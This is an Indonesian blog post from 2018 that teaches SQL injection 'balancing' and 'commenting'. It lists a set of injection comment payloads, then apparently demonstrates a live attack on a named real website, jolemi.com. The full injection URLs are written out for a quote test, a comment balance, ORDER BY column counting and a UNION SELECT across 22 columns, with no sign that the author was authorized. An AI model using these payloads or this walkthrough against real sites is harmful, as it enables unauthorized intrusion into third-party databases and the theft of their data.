Kamis, 30 Agustus 2018

Balancing dan Commenting dalam SQL Injection


Assalamualaikum..

Selamat malam semuanya. Apa kabar? Semoga sehat selalu. Kesempatan kali ini saya akan membahas tentang Balancing dan Commenting dalam SQL Injection. Sealamat membaca!

1. Balancing

SELECT * FROM berita WHERE berita_id=('1')
Kalau kodingan PHP-nya seperti di atas, maka kita balance inputnya menjadi ?id=1').

2. Commenting

Contoh commenting dalam SQL Injection adalah -- - atau --+. Fungsinya adalah supaya suntikan SQL kita dianggap valid oleh aplikasi webnya. 

Untuk lebih jelasnya, perhatikan gambar berikut:


Jadi, balancing dan commenting itu erat kaitannya. Bisa dibilang, keduanya berfungsi untuk menyeimbangkan agar website kembali normal ketika ditambahkan string yang memicu error pada database.

Di bawah ini adalah beberapa contoh balancing dan commenting dalam SQL Injection:

--
-- -
--+-
`
)--
)-- -
)--+-
))--
))-- -
))--+-
;
);
));
%23
%2523
%60
%2560
%90
%2590
;%2500
0%0a
--%a0
/*
/**/
and 1=1
and '1'='1
and (1)=(1 
php?id=(1)-- -

Sekarang kita akan praktik mengenai balancing dan commenting. Seperti biasa, kita cari dulu web yang mau diuji coba. Saya sudah menyiapkannya, yaitu https://jolemi.com/index.php?route=blog/article&article_id=74. Tambahkan (') untuk tes vuln.


Setelah ditambahkan ('), sebagian tampilan website hilang dan muncul pesan error di bagian atas yang menandakan web tersebut rentan terhadap SQL Injection. Selanjutnya, kita coba balance inputnya dengan menambahkan commenting -- -. Jadinya seperti ini, https://jolemi.com/index.php?route=blog/article&article_id=74'-- -.


Website kembali normal setelah ditambahkan -- -. Sekarang masuk ke tahap Order By. Kita urutkan angkanya sampai web kembali error. 


Hmm, kira-kira apa yang salah? Coba kita ganti commentingnya. Yang tadinya menggunakan -- - ganti dengan ;.


Sekarang kita cari angka terkecil dimana web menjadi error. Ayo kita urutkan lagi :p


Karena error di angka 23, itu artinya jumlah columnnya ada 22. Sekarang lanjut ke tahap Union Select. Jadinya seperti ini, https://jolemi.com/index.php?route=blog/article&article_id=-74' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22;.


Nahh, angka ajaibnya udah keluar. Saya cukup sampai sini saja. Karena kalau dilanjutkan nanti jadinya di luar pembahasan :p

Oke cukup sekian pembahasan mengenai Balancing dan Commenting dalam SQL Injection. Apabila ada kesalahan mohon koreksinya. Silahkan bertanya di kolom komentar, InshaAllah saya jawab :D

Wassalamualaikum..

0 komentar:

Posting Komentar